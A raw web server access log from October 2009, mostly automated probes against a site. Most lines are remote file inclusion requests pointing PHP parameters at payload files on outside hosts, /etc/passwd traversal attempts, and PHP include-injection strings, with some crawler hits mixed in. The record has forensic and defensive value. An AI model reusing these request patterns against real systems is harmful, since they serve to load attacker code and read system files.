211.133.240.90 - - [28/Oct/2009:05:17:58 -0400] "GET //index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.133.240.90 - - [28/Oct/2009:05:18:18 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:18:20 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.218.228.226 - - [28/Oct/2009:05:18:50 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:05:21:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.129.199 - - [28/Oct/2009:05:21:20 -0400] "GET /include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:23 -0400] "GET /logs/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:24 -0400] "GET /logs/access_log.Q109052800/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:21:24 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:21:24 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:21:24 -0400] "GET /logs/access_log.Q109092900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:27 -0400] "GET /logs/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:28 -0400] "GET /logs/access_log.Q109052800%20%20/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:29 -0400] "GET /include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:21:32 -0400] "GET /logs/access_log.Q109062700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:21:35 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:21:35 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:21:35 -0400] "GET //index.php?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:45 -0400] "GET /logs/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:45 -0400] "GET /logs/access_log.Q109052800/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:47 -0400] "GET /include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:21:57 -0400] "GET /logs/error_log.Q109052800/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:22:01 -0400] "GET /logs/error_log.Q109052800%20%20/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.50.129.199 - - [28/Oct/2009:05:22:12 -0400] "GET /logs/error_log.Q109052800/include/bbs.lib.inc.php?site_path=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
220.181.7.60 - - [28/Oct/2009:05:22:58 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
61.47.7.71 - - [28/Oct/2009:05:23:17 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.84.137.165 - - [28/Oct/2009:05:23:30 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:23:30 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:23:30 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
66.249.65.201 - - [28/Oct/2009:05:23:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E58E9F4004379051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.234.2.106 - - [28/Oct/2009:05:23:44 -0400] "GET //Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:23:44 -0400] "GET /logs//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:23:44 -0400] "GET /logs/access_log.Q109082600%20%20//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:23:52 -0400] "GET /logs/access_log.Q109090600%20%20//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.125.66.60 - - [28/Oct/2009:05:24:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.133.240.90 - - [28/Oct/2009:05:24:04 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.110.164 - - [28/Oct/2009:05:24:04 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.133.240.90 - - [28/Oct/2009:05:24:10 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.84.137.165 - - [28/Oct/2009:05:24:14 -0400] "GET /logs/access_log.Q109082500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
67.195.110.164 - - [28/Oct/2009:05:24:06 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.143.3.188 - - [28/Oct/2009:05:26:18 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
174.143.3.188 - - [28/Oct/2009:05:26:19 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
174.143.3.188 - - [28/Oct/2009:05:26:19 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [28/Oct/2009:05:26:19 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
209.59.12.99 - - [28/Oct/2009:05:26:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.123.212.188 - - [28/Oct/2009:05:27:13 -0400] "GET /logs/access_log.Q109092900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:27:17 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:27:17 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.218.116.164 - - [28/Oct/2009:05:27:22 -0400] "GET /logs/access_log.Q109080400 HTTP/1.0" 200 4786327 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET /logs/access_log.Q109092500//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:24 -0400] "GET /logs/access_log.Q109092500//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:27 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:27 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:27 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:29 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:29 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:29 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:34 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:34 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:43 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:43 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:59 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:59 -0400] "GET /logs/access_log.Q109092500//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:29:59 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:30:00 -0400] "GET //include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:30:00 -0400] "GET /logs//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:30:00 -0400] "GET /logs/access_log.Q109092500//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:30:13 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.165.81 - - [28/Oct/2009:05:30:14 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:30:19 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:05:30:19 -0400] "GET /logs/access_log.Q109092900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.84.137.165 - - [28/Oct/2009:05:30:22 -0400] "GET /logs/error_log.Q109051200%20/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.59.12.99 - - [28/Oct/2009:05:31:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.120.90.223 - - [28/Oct/2009:05:31:47 -0400] "GET /logs/access_log.Q109061200/product.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:31:47 -0400] "GET /product.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:31:47 -0400] "GET /logs/product.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:32:01 -0400] "GET /logs/access_log.Q109081300/product.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.812"
195.2.72.173 - - [28/Oct/2009:05:32:04 -0400] "GET /logs/access_log.Q109062000//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.2.72.173 - - [28/Oct/2009:05:32:04 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.2.72.173 - - [28/Oct/2009:05:32:04 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/id1.txt?? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
199.120.90.223 - - [28/Oct/2009:05:33:18 -0400] "GET /product.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.812"
88.84.137.165 - - [28/Oct/2009:05:34:14 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:34:14 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:34:14 -0400] "GET /logs/access_log.Q109060900//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:34:23 -0400] "GET /logs/access_log.Q109080500//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
199.120.90.223 - - [28/Oct/2009:05:35:00 -0400] "GET /logs/access_log.Q109061200/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:35:00 -0400] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:35:00 -0400] "GET /logs/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:35:13 -0400] "GET /logs/access_log.Q109081300/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
203.228.253.177 - - [28/Oct/2009:05:35:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.228.253.177 - - [28/Oct/2009:05:35:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.228.253.177 - - [28/Oct/2009:05:35:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.228.253.177 - - [28/Oct/2009:05:35:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
199.120.90.223 - - [28/Oct/2009:05:36:02 -0400] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
209.59.12.99 - - [28/Oct/2009:05:36:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [28/Oct/2009:05:36:58 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
174.143.3.188 - - [28/Oct/2009:05:36:58 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [28/Oct/2009:05:36:59 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [28/Oct/2009:05:36:59 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
202.123.212.188 - - [28/Oct/2009:05:37:20 -0400] "GET /logs/access_log.Q109092900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:05:38:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E590994004479051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.123.212.188 - - [28/Oct/2009:05:39:32 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.73.181.125 - - [28/Oct/2009:05:39:46 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:46 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:46 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:53 -0400] "GET /logs/access_log.Q109093000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:53 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:53 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:54 -0400] "GET /logs/access_log.Q109093000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:54 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:54 -0400] "GET /logs/access_log.Q109093000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:54 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:54 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:39:55 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.831"
211.223.201.177 - - [28/Oct/2009:05:40:17 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:22 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:22 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:30 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.84.137.165 - - [28/Oct/2009:05:40:34 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:40:34 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:40:34 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:40:35 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
211.223.201.177 - - [28/Oct/2009:05:40:35 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:35 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
